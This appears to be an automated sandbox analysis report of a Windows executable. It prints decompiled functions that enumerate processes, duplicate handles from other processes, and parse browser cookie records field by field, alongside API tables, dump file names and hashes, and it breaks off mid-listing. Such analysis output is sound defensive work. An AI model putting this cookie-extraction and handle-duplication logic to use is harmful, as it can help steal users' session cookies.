                                                                                                                                                      0x0040c93d
                                                                                                                                                      0x0040c943
                                                                                                                                                      0x0040c946
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c946
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c948
                                                                                                                                                      0x0040c948
                                                                                                                                                      0x0040c94e
                                                                                                                                                      0x0040c7e0
                                                                                                                                                      0x0040c957
                                                                                                                                                      0x0040c95a
                                                                                                                                                      0x0040c95f
                                                                                                                                                      0x0040c965
                                                                                                                                                      0x0040c965
                                                                                                                                                      0x0040c96b
                                                                                                                                                      0x0040c973
                                                                                                                                                      0x0040c97f

                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 0040C725
                                                                                                                                                        • Part of subcall function 00405800: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,004073D6,00000000,00407289,?,00000000,00000208,?), ref: 0040580B
                                                                                                                                                      • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,00000000), ref: 0040C74C
                                                                                                                                                      • FindCloseChangeNotification.KERNELBASE(?,?,?,?,00000000), ref: 0040C762
                                                                                                                                                      • GetCurrentProcessId.KERNEL32(?,?,?,00000000), ref: 0040C76A
                                                                                                                                                      • _wcsicmp.MSVCRT ref: 0040C816
                                                                                                                                                      • OpenProcess.KERNEL32(00000040,00000000,?,?,?,?,?,00000000), ref: 0040C839
                                                                                                                                                      • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000002,?,?,?,00000000), ref: 0040C882
                                                                                                                                                      • DuplicateHandle.KERNELBASE(00000000,?,00000000,?,?,?,00000000), ref: 0040C891
                                                                                                                                                      • memset.MSVCRT ref: 0040C8AF
                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 0040C8E2
                                                                                                                                                      • _wcsicmp.MSVCRT ref: 0040C902
                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000000), ref: 0040C93D
                                                                                                                                                      • FreeLibrary.KERNELBASE(?,?,?,?,?,00000000), ref: 0040C95F
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseHandleProcess$CurrentFile_wcsicmpmemset$ChangeCreateDuplicateFindFreeLibraryModuleNameNotificationOpen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 832456665-0
                                                                                                                                                      • Opcode ID: 112fab85cbf0c6bef0d13e6ff02aaec31bd4d1831785e58f41808b8cf733c709
                                                                                                                                                      • Instruction ID: de6e42d4d0ab8c6b3742c2937cd5abb5ca9b3ab329c089935e202bb2c8060a11
                                                                                                                                                      • Opcode Fuzzy Hash: 112fab85cbf0c6bef0d13e6ff02aaec31bd4d1831785e58f41808b8cf733c709
                                                                                                                                                      • Instruction Fuzzy Hash: 6A81F2B1C00219EFDB10EFA5C9859AEBBB5FB08305F6085BAE905B7291D7385E44CF58
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0040D9FC, Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040D9FC(unsigned int _a4, WCHAR* _a8, WCHAR* _a12) {
				struct HRSRC__* _t12;
				void* _t16;
				void* _t17;
				signed int _t18;
				signed int _t26;
				signed int _t29;
				signed int _t33;
				struct HRSRC__* _t35;
				signed int _t36;

				_t12 = FindResourceW(_a4, _a12, _a8); // executed
				_t35 = _t12;
				if(_t35 != 0) {
					_t33 = SizeofResource(_a4, _t35);
					if(_t33 > 0) {
						_t16 = LoadResource(_a4, _t35);
						if(_t16 != 0) {
							_t17 = LockResource(_t16);
							if(_t17 != 0) {
								_a4 = _t33;
								_t29 = _t33 * _t33;
								_t36 = 0;
								_t7 =  &_a4;
								 *_t7 = _a4 >> 2;
								if( *_t7 != 0) {
									do {
										_t26 =  *(_t17 + _t36 * 4) * _t36 * _t33 * 0x00000011 ^  *(_t17 + _t36 * 4) + _t29;
										_t36 = _t36 + 1;
										_t29 = _t26;
									} while (_t36 < _a4);
								}
								_t18 =  *0x412b10; // 0x10350e5a
								 *0x412b10 = _t18 + _t29 ^ _t33;
							}
						}
					}
				}
				return 1;
			}












                                                                                                                                                      0x0040da09
                                                                                                                                                      0x0040da0f
                                                                                                                                                      0x0040da13
                                                                                                                                                      0x0040da20
                                                                                                                                                      0x0040da24
                                                                                                                                                      0x0040da2a
                                                                                                                                                      0x0040da32
                                                                                                                                                      0x0040da35
                                                                                                                                                      0x0040da3d
                                                                                                                                                      0x0040da41
                                                                                                                                                      0x0040da44
                                                                                                                                                      0x0040da47
                                                                                                                                                      0x0040da49
                                                                                                                                                      0x0040da49
                                                                                                                                                      0x0040da4d
                                                                                                                                                      0x0040da50
                                                                                                                                                      0x0040da60
                                                                                                                                                      0x0040da62
                                                                                                                                                      0x0040da66
                                                                                                                                                      0x0040da66
                                                                                                                                                      0x0040da6a
                                                                                                                                                      0x0040da6b
                                                                                                                                                      0x0040da74
                                                                                                                                                      0x0040da74
                                                                                                                                                      0x0040da3d
                                                                                                                                                      0x0040da32
                                                                                                                                                      0x0040da79
                                                                                                                                                      0x0040da7f

                                                                                                                                                      APIs
                                                                                                                                                      • FindResourceW.KERNELBASE(?,?,?), ref: 0040DA09
                                                                                                                                                      • SizeofResource.KERNEL32(?,00000000), ref: 0040DA1A
                                                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 0040DA2A
                                                                                                                                                      • LockResource.KERNEL32(00000000), ref: 0040DA35
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3473537107-0
                                                                                                                                                      • Opcode ID: 3f2537d69a83dbad711086520e7fd7dadb7db9e2dcff2647f4325042d9b9d9c7
                                                                                                                                                      • Instruction ID: 1e085ebe6cf1454c0a13dd2dc3297af32645bfe8ec8fc95f9f4fc45ffd099028
                                                                                                                                                      • Opcode Fuzzy Hash: 3f2537d69a83dbad711086520e7fd7dadb7db9e2dcff2647f4325042d9b9d9c7
                                                                                                                                                      • Instruction Fuzzy Hash: 9B018032B04215ABCB299FE5DD4995BBFAAFB853907048036AC09EA360D770CD14CAD8
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0040C516, Relevance: 1.5, APIs: 1, Instructions: 11nativeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040C516(signed int* __eax, void* _a4, long _a8, long* _a12) {
				signed int _t5;
				long _t7;

				_t5 =  *__eax;
				if(_t5 == 0) {
					return _t5 | 0xffffffff;
				}
				_t7 = NtQuerySystemInformation(0x10, _a4, _a8, _a12); // executed
				return _t7;
			}





                                                                                                                                                      0x0040c516
                                                                                                                                                      0x0040c51a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c52e
                                                                                                                                                      0x0040c52a
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      • NtQuerySystemInformation.NTDLL(00000010,?,?,?,0040C5A6,00000000,00001000,00000000,?,?,00000000), ref: 0040C52A
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InformationQuerySystem
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3562636166-0
                                                                                                                                                      • Opcode ID: 738e521c8b0e2f7fb8dbff4b4999eafe421484fd9be088d8b3f21b89483e91da
                                                                                                                                                      • Instruction ID: c4ee8ba0ae0e5c888482442c657d74a2bffdce45b5391c025a143593a4db9a10
                                                                                                                                                      • Opcode Fuzzy Hash: 738e521c8b0e2f7fb8dbff4b4999eafe421484fd9be088d8b3f21b89483e91da
                                                                                                                                                      • Instruction Fuzzy Hash: 16C0123D108200FEDA014BA08C40E0FB791AF89770F14CB19B174900E0C2B1D020A722
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0040BE98, Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 155COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 91%
                                                                                                                                                      			E0040BE98(void* __ecx, void* __edx, void* __eflags, intOrPtr _a12, char _a24, struct HWND__* _a28, struct HWND__* _a32, intOrPtr _a36, struct HWND__* _a40, struct tagMSG _a44, char _a72, char _a76, struct HWND__* _a592, struct HACCEL__* _a616, intOrPtr _a664, intOrPtr _a1792, char* _a1800, struct HWND__* _a1820) {
				char _v4;
				char _v8;
				struct HWND__* _v12;
				void* __edi;
				void* __esi;
				void* _t42;
				struct HWND__* _t53;
				void* _t60;
				struct HWND__* _t69;
				struct HWND__* _t71;
				struct HWND__* _t76;
				int _t82;
				int _t84;
				struct HWND__* _t85;
				void* _t93;
				struct HWND__* _t107;
				struct HWND__* _t108;

				_t93 = __edx;
				_t92 = __ecx;
				E0040E340(0x27a4, __ecx);
				_t42 = E00402754(_t92);
				if(_t42 != 0) {
					E0040DA9D();
					SetErrorMode(0x8001); // executed
					 *0x412b10 = 0x11223344;
					EnumResourceTypesW(GetModuleHandleW(0), E0040DA82, 0); // executed
					E0040621C( &_v4);
					_push( &_a76);
					_a36 = 0x20;
					_a28 = 0;
					_a40 = 0;
					_a32 = 0;
					_a44.hwnd = 0;
					E0040BB15(__eflags);
					_a1800 =  &_v8;
					E004064A1(_t92, __eflags,  &_v8, _a12);
					_t53 = E004065C4(_a1792, L"/savelangfile");
					__eflags = _t53;
					if(_t53 < 0) {
						E00407259(); // executed
						__eflags = E004065C4(_a1800, L"/deleteregkey");
						if(__eflags < 0) {
							__eflags =  *((intOrPtr*)(_a1800 + 0x30)) - 1;
							if(__eflags <= 0) {
								L7:
								E0040BA94( &_a72);
								__eflags = _a664 - 3;
								if(_a664 != 3) {
									_push(5);
								} else {
									_push(3);
								}
								ShowWindow(_a592, ??);
								UpdateWindow(_a592);
								_a616 = LoadAcceleratorsW(GetModuleHandleW(0), 0x67);
								__eflags = GetMessageW( &_a44, 0, 0, 0);
								while(__eflags != 0) {
									_t69 =  *0x412c2c; // 0x0
									__eflags = _t69;
									_t107 = _t69;
									if(_t69 == 0) {
										L14:
										_t71 = TranslateAcceleratorW(_a592, _a616,  &_a44);
										__eflags = _t71;
										if(_t71 == 0) {
											goto L15;
										}
									} else {
										_t85 = GetForegroundWindow();
										__eflags = _t107 - _t85;
										if(_t107 == _t85) {
											L15:
											_t108 =  *0x412c2c; // 0x0
											_v12 = _a1820;
											_t76 = IsDialogMessageW(_a592,  &_a44);
											__eflags = _t76;
											if(_t76 == 0) {
												__eflags = _t108;
												if(_t108 == 0) {
													L18:
													__eflags = _v12;
													if(_v12 == 0) {
														L20:
														TranslateMessage( &_a44);
														DispatchMessageW( &_a44);
													} else {
														_t82 = IsDialogMessageW(_v12,  &_a44);
														__eflags = _t82;
														if(_t82 == 0) {
															goto L20;
														}
													}
												} else {
													_t84 = IsDialogMessageW(_t108,  &_a44);
													__eflags = _t84;
													if(_t84 == 0) {
														goto L18;
													}
												}
											}
										} else {
											goto L14;
										}
									}
									__eflags = GetMessageW( &_a44, 0, 0, 0);
								}
							} else {
								__eflags = E0040BD40( &_a72, _t93, __eflags);
								if(__eflags == 0) {
									goto L7;
								}
							}
						}
					} else {
						 *0x4131d0 = 0x412374;
						E004073F7(_t92);
					}
					E0040BC51( &_a72, __eflags);
					E0040623E( &_v8);
					E00403F55( &_a24);
					E0040623E( &_v8);
					_t60 = 0;
					__eflags = 0;
				} else {
					_t60 = _t42 + 1;
				}
				return _t60;
			}




















                                                                                                                                                      0x0040be98
                                                                                                                                                      0x0040be98
                                                                                                                                                      0x0040bea3
                                                                                                                                                      0x0040beab
                                                                                                                                                      0x0040beb2
                                                                                                                                                      0x0040beba
                                                                                                                                                      0x0040bec4
                                                                                                                                                      0x0040bed9
                                                                                                                                                      0x0040bee6
                                                                                                                                                      0x0040bef0
                                                                                                                                                      0x0040bef9
                                                                                                                                                      0x0040befa
                                                                                                                                                      0x0040bf02
                                                                                                                                                      0x0040bf06
                                                                                                                                                      0x0040bf0a
                                                                                                                                                      0x0040bf0e
                                                                                                                                                      0x0040bf12
                                                                                                                                                      0x0040bf1f
                                                                                                                                                      0x0040bf26
                                                                                                                                                      0x0040bf37
                                                                                                                                                      0x0040bf3c
                                                                                                                                                      0x0040bf3e
                                                                                                                                                      0x0040bf54
                                                                                                                                                      0x0040bf6a
                                                                                                                                                      0x0040bf6c
                                                                                                                                                      0x0040bf79
                                                                                                                                                      0x0040bf7d
                                                                                                                                                      0x0040bf90
                                                                                                                                                      0x0040bf94
                                                                                                                                                      0x0040bf99
                                                                                                                                                      0x0040bfa1
                                                                                                                                                      0x0040bfa7
                                                                                                                                                      0x0040bfa3
                                                                                                                                                      0x0040bfa3
                                                                                                                                                      0x0040bfa3
                                                                                                                                                      0x0040bfb0
                                                                                                                                                      0x0040bfbd
                                                                                                                                                      0x0040bfd1
                                                                                                                                                      0x0040bfe4
                                                                                                                                                      0x0040bfe6
                                                                                                                                                      0x0040bff2
                                                                                                                                                      0x0040bff7
                                                                                                                                                      0x0040bff9
                                                                                                                                                      0x0040bffb
                                                                                                                                                      0x0040c007
                                                                                                                                                      0x0040c01a
                                                                                                                                                      0x0040c020
                                                                                                                                                      0x0040c022
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040bffd
                                                                                                                                                      0x0040bffd
                                                                                                                                                      0x0040c003
                                                                                                                                                      0x0040c005
                                                                                                                                                      0x0040c024
                                                                                                                                                      0x0040c02b
                                                                                                                                                      0x0040c031
                                                                                                                                                      0x0040c041
                                                                                                                                                      0x0040c043
                                                                                                                                                      0x0040c045
                                                                                                                                                      0x0040c047
                                                                                                                                                      0x0040c049
                                                                                                                                                      0x0040c057
                                                                                                                                                      0x0040c057
                                                                                                                                                      0x0040c05b
                                                                                                                                                      0x0040c06c
                                                                                                                                                      0x0040c071
                                                                                                                                                      0x0040c07c
                                                                                                                                                      0x0040c05d
                                                                                                                                                      0x0040c066
                                                                                                                                                      0x0040c068
                                                                                                                                                      0x0040c06a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c06a
                                                                                                                                                      0x0040c04b
                                                                                                                                                      0x0040c051
                                                                                                                                                      0x0040c053
                                                                                                                                                      0x0040c055
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c055
                                                                                                                                                      0x0040c049
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c005
                                                                                                                                                      0x0040c090
                                                                                                                                                      0x0040c090
                                                                                                                                                      0x0040bf7f
                                                                                                                                                      0x0040bf88
                                                                                                                                                      0x0040bf8a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040bf8a
                                                                                                                                                      0x0040bf7d
                                                                                                                                                      0x0040bf40
                                                                                                                                                      0x0040bf40
                                                                                                                                                      0x0040bf4a
                                                                                                                                                      0x0040bf4a
                                                                                                                                                      0x0040c09c
                                                                                                                                                      0x0040c0a5
                                                                                                                                                      0x0040c0ae
                                                                                                                                                      0x0040c0b7
                                                                                                                                                      0x0040c0bc
                                                                                                                                                      0x0040c0bc
                                                                                                                                                      0x0040beb4
                                                                                                                                                      0x0040beb4
                                                                                                                                                      0x0040beb4
                                                                                                                                                      0x0040c0c4

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00402754: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040BEB0,00000000,?,00000002,?,0040E23C,00000000,?,0000000A), ref: 00402773
                                                                                                                                                        • Part of subcall function 00402754: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00402785
                                                                                                                                                        • Part of subcall function 00402754: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040BEB0,00000000,?,00000002,?,0040E23C,00000000,?,0000000A), ref: 00402799
                                                                                                                                                        • Part of subcall function 00402754: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004027C4
                                                                                                                                                      • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0040E23C,00000000,?,0000000A), ref: 0040BEC4
                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,0040DA82,00000000,?,00000002,?,0040E23C,00000000,?,0000000A), ref: 0040BEE3
                                                                                                                                                      • EnumResourceTypesW.KERNEL32 ref: 0040BEE6
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                                                                                      • String ID: $/deleteregkey$/savelangfile
                                                                                                                                                      • API String ID: 2744995895-28296030
                                                                                                                                                      • Opcode ID: 16670ade8d057f9152663538c6d4224641cd9f1f9fcff8b2ffb5104e2a31c215
                                                                                                                                                      • Instruction ID: 7c11083c69c625fd9a2f21e20e1dcd1dda6225a88cbd83bdad8d2a1ddbeb11aa
                                                                                                                                                      • Opcode Fuzzy Hash: 16670ade8d057f9152663538c6d4224641cd9f1f9fcff8b2ffb5104e2a31c215
                                                                                                                                                      • Instruction Fuzzy Hash: E2516C71508345EBD720AFA1DD8895FB7E8FB84304F40493EFA85E3191DB39E8088B5A
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0040D071, Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 33libraryloaderCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040D071(struct HINSTANCE__** __esi) {
				void* _t7;
				struct HINSTANCE__* _t8;
				_Unknown_base(*)()* _t14;

				if( *__esi == 0) {
					_t8 = LoadLibraryW(L"psapi.dll"); // executed
					 *__esi = _t8;
					__esi[1] = GetProcAddress(_t8, "GetModuleBaseNameW");
					__esi[2] = GetProcAddress( *__esi, "EnumProcessModules");
					__esi[3] = GetProcAddress( *__esi, "EnumProcessModulesEx");
					__esi[5] = GetProcAddress( *__esi, "GetModuleFileNameExW");
					__esi[6] = GetProcAddress( *__esi, "EnumProcesses");
					_t14 = GetProcAddress( *__esi, "GetModuleInformation");
					__esi[4] = _t14;
					return _t14;
				}
				return _t7;
			}






                                                                                                                                                      0x0040d074
                                                                                                                                                      0x0040d07c
                                                                                                                                                      0x0040d08e
                                                                                                                                                      0x0040d099
                                                                                                                                                      0x0040d0a5
                                                                                                                                                      0x0040d0b1
                                                                                                                                                      0x0040d0bd
                                                                                                                                                      0x0040d0c9
                                                                                                                                                      0x0040d0cc
                                                                                                                                                      0x0040d0ce
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040d0d1
                                                                                                                                                      0x0040d0d2

                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryW.KERNELBASE(psapi.dll,0040C7D4,0040D051,747859F0,0040CF75,?,?), ref: 0040D07C
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040D090
                                                                                                                                                      • GetProcAddress.KERNEL32(0040C7D4,EnumProcessModules), ref: 0040D09C
                                                                                                                                                      • GetProcAddress.KERNEL32(0040C7D4,EnumProcessModulesEx), ref: 0040D0A8
                                                                                                                                                      • GetProcAddress.KERNEL32(0040C7D4,GetModuleFileNameExW), ref: 0040D0B4
                                                                                                                                                      • GetProcAddress.KERNEL32(0040C7D4,EnumProcesses), ref: 0040D0C0
                                                                                                                                                      • GetProcAddress.KERNEL32(0040C7D4,GetModuleInformation), ref: 0040D0CC
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressProc$LibraryLoad
                                                                                                                                                      • String ID: EnumProcessModules$EnumProcessModulesEx$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                      • API String ID: 2238633743-4233621989
                                                                                                                                                      • Opcode ID: 0789f8285eff88e4c124665e95ccda41b1b8d99a0419bcd589fce340f2d6ed66
                                                                                                                                                      • Instruction ID: 664551807a59a5b6bdf4ad21fd1c91f4c0cb88ece692cebe109dcbeab8ff2071
                                                                                                                                                      • Opcode Fuzzy Hash: 0789f8285eff88e4c124665e95ccda41b1b8d99a0419bcd589fce340f2d6ed66
                                                                                                                                                      • Instruction Fuzzy Hash: BDF0E274980704AACB706F759D49E46BAF0EFA8700721492EE1E5A3690D6B9A0C4CF88
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00403BAF, Relevance: 19.7, APIs: 4, Strings: 9, Instructions: 192COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 95%
                                                                                                                                                      			E00403BAF(void* __edx, intOrPtr* _a4, intOrPtr _a8) {
				int _v8;
				intOrPtr _v12;
				int _v16;
				int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				int _v60;
				int _v64;
				int _v68;
				char _v72;
				intOrPtr _v76;
				int _v80;
				int _v84;
				int _v88;
				int _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				signed int _v112;
				signed int _v116;
				void _v124;
				void _v132;
				void _v136;
				char _v140;
				char _v912;
				char _v936;
				char _v1496;
				char _v1500;
				void* __edi;
				void* __esi;
				void* _t89;
				signed int _t109;
				signed int _t114;
				intOrPtr _t119;
				intOrPtr _t120;
				intOrPtr _t121;
				intOrPtr _t122;
				intOrPtr _t123;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr* _t137;
				intOrPtr* _t139;
				void* _t142;
				intOrPtr _t147;
				intOrPtr _t148;
				void* _t151;
				void* _t163;

				_t151 = __edx;
				_v76 = 0x100;
				_v56 = 0x100;
				_v80 = 0;
				_v92 = 0;
				_v88 = 0;
				_v84 = 0;
				_v60 = 0;
				_v72 = 0;
				_v68 = 0;
				_v64 = 0;
				E00403E49( &_v1500);
				_t89 = E004048DA(_t142, _t151,  &_v1500, _a8, _a4 + 4); // executed
				_t164 = _t89;
				if(_t89 == 0) {
					L30:
					E00403E8F( &_v912);
					E00403F55( &_v936);
					E00406710( &_v1496);
					E00406355( &_v72);
					return E00406355( &_v92);
				} else {
					_v12 = 0x20;
					_v20 = 0;
					_v8 = 0;
					_v16 = 0;
					do {
						if(E00404BE4(_t164,  &_v1500,  &_v20) != 0) {
							_t161 =  &_v20;
							_v24 = E004039C1( &_v20, L"Name");
							_v28 = E004039C1( &_v20, L"Value");
							_v32 = E004039C1( &_v20, L"Path");
							_v36 = E004039C1( &_v20, L"RDomain");
							_v48 = E004039C1(_t161, L"Expires");
							_v52 = E004039C1(_t161, L"LastModified");
							_v44 = E004039C1(_t161, L"EntryId");
							_v40 = E004039C1(_t161, L"Flags");
							if(_v24 != 0 && _v28 != 0 && _v32 != 0 && _v36 != 0) {
								_t109 = memset( &_v136, 0, 0x2c);
								_t163 = _t163 + 0xc;
								E0040637A(_t109 | 0xffffffff,  &_v92, 0x40f454);
								E0040518A( &_v92, _v36);
								_t114 = _v92;
								_v112 = 0x40f454;
								if(_t114 != 0) {
									_v112 = _t114;
								}
								E0040637A(_t114 | 0xffffffff,  &_v72, 0x40f454);
								E0040518A( &_v72, _v32);
								_t119 = _v72;
								_v116 = 0x40f454;
								if(_t119 != 0) {
									_v116 = _t119;
								}
								_t120 = _v24;
								_t147 =  *((intOrPtr*)(_t120 + 0x328));
								if(_t147 <= 0) {
									_v108 = 0x40f924;
								} else {
									_t139 = _t120 + 0x220;
									 *((char*)(_t147 +  *_t139 - 1)) = 0;
									_v108 =  *_t139;
								}
								_t121 = _v28;
								_t148 =  *((intOrPtr*)(_t121 + 0x328));
								if(_t148 <= 0) {
									_v104 = 0x40f924;
								} else {
									_t137 = _t121 + 0x220;
									 *((char*)( *_t137 + _t148 - 1)) = 0;
									_v104 =  *_t137;
								}
								_t122 = _v48;
								if(_t122 != 0) {
									memcpy( &_v132, _t122 + 0x220, 8);
									_t163 = _t163 + 0xc;
								}
								_t123 = _v52;
								if(_t123 != 0) {
									memcpy( &_v124, _t123 + 0x220, 8);
									_t163 = _t163 + 0xc;
								}
								_t124 = _v40;
								if(_t124 != 0) {
									_v96 =  *((intOrPtr*)(_t124 + 0x220));
								}
								_t125 = _v44;
								if(_t125 == 0) {
									_v140 = 0;
									_v136 = 0;
								} else {
									_v140 =  *((intOrPtr*)(_t125 + 0x220));
									_v136 =  *((intOrPtr*)(_t125 + 0x224));
								}
								_v100 = _a8;
								 *((intOrPtr*)( *_a4))( &_v140);
							}
						}
					} while (E0040489D( &_v1500) != 0);
					if(_v20 != 0) {
						free(_v20);
					}
					goto L30;
				}
			}


























































                                                                                                                                                      0x00403baf
                                                                                                                                                      0x00403bc1
                                                                                                                                                      0x00403bc4
                                                                                                                                                      0x00403bce
                                                                                                                                                      0x00403bd1
                                                                                                                                                      0x00403bd4
                                                                                                                                                      0x00403bd7
                                                                                                                                                      0x00403bda
                                                                                                                                                      0x00403bdd
                                                                                                                                                      0x00403be0
                                                                                                                                                      0x00403be3
                                                                                                                                                      0x00403be6
                                                                                                                                                      0x00403bfc
                                                                                                                                                      0x00403c01
                                                                                                                                                      0x00403c03
                                                                                                                                                      0x00403e11
                                                                                                                                                      0x00403e17
                                                                                                                                                      0x00403e22
                                                                                                                                                      0x00403e2d
                                                                                                                                                      0x00403e35
                                                                                                                                                      0x00403e46
                                                                                                                                                      0x00403c09
                                                                                                                                                      0x00403c09
                                                                                                                                                      0x00403c10
                                                                                                                                                      0x00403c13
                                                                                                                                                      0x00403c16
                                                                                                                                                      0x00403c19
                                                                                                                                                      0x00403c2b
                                                                                                                                                      0x00403c36
                                                                                                                                                      0x00403c43
                                                                                                                                                      0x00403c50
                                                                                                                                                      0x00403c5d
                                                                                                                                                      0x00403c6a
                                                                                                                                                      0x00403c77
                                                                                                                                                      0x00403c84
                                                                                                                                                      0x00403c91
                                                                                                                                                      0x00403c9c
                                                                                                                                                      0x00403c9f
                                                                                                                                                      0x00403cca
                                                                                                                                                      0x00403ccf
                                                                                                                                                      0x00403cde
                                                                                                                                                      0x00403ce8
                                                                                                                                                      0x00403ced
                                                                                                                                                      0x00403cf2
                                                                                                                                                      0x00403cf5
                                                                                                                                                      0x00403cf7
                                                                                                                                                      0x00403cf7
                                                                                                                                                      0x00403d01
                                                                                                                                                      0x00403d0b
                                                                                                                                                      0x00403d10
                                                                                                                                                      0x00403d15
                                                                                                                                                      0x00403d18
                                                                                                                                                      0x00403d1a
                                                                                                                                                      0x00403d1a
                                                                                                                                                      0x00403d1d
